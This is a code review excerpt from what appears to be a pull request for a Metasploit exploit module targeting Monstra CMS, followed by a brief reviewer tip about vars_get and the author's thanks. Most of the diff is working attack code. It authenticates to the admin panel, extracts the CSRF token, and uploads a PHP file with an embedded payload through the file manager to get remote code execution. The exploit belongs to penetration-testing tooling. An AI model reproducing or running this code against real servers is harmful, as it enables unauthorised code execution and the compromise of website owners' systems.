modules/exploits/multi/http/monstra_fileupload_exec.rb

```diff
@@ -0,0 +1,184 @@
+          'vars_post' => {
+            'login' => datastore['USERNAME'],
+            'password' => datastore['PASSWORD'],
+            'login_submit' => 'Log+In',
+          },
+        })
+        cookies = res.get_cookies
+
+        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+    
+        # Try to access index page with authenticated cookie.
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(uri, 'admin' '/index.php'),
+          'cookie' => cookies,
+
+        })
+        
+        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+    
+        # if we redirect to core_welcome dan we assume we have authenticated cookie.
+        if res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard')
+          print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
+          store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+          return cookies
+        else
+          fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+        end
+    end
+
+
+    def exploit
+       
+	#Login Function Execute and Return Cookies
+        cookies = login
+
+	#Random payload name.
+        pay_name = rand_text_alpha(rand(5..10)) + ".PHP"	
+    
+
+        # Payload Gen.
+        evilbyte = "<?php #{payload.encode}; ?>"
+
+        # Request for CSRF token for file upload.
+        res = send_request_cgi({
+          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
+          'method' => 'GET',
+          'cookie' => cookies,
+        })
+     
+        # Grabbing CSRF token from body
+        /<input type="hidden" id="csrf" name="csrf" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+        vprint_good("CSRF-Token for File Upload : #{csrf}")
+
+        
+    
+        # setup POST request.
+        post_data = Rex::MIME::Message.new
+        post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="csrf"') # CSRF token #form-data; name="file"; filename="agent22.PHP"
+        post_data.add_part("#{evilbyte}", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"#{pay_name}\"")  # payload
+        post_data.add_part("Upload", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="upload_file"')  # extra
+        data = post_data.to_s
+    
+        vprint_status('Trying to upload file with malicious Content....')
+        # Lets Send Upload request.
+        res = send_request_cgi({
+          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
```

Comment:
`vars_get` is preferred

`vars_get' => 'id=filesmanager'`

Reply:
thanks for tip ...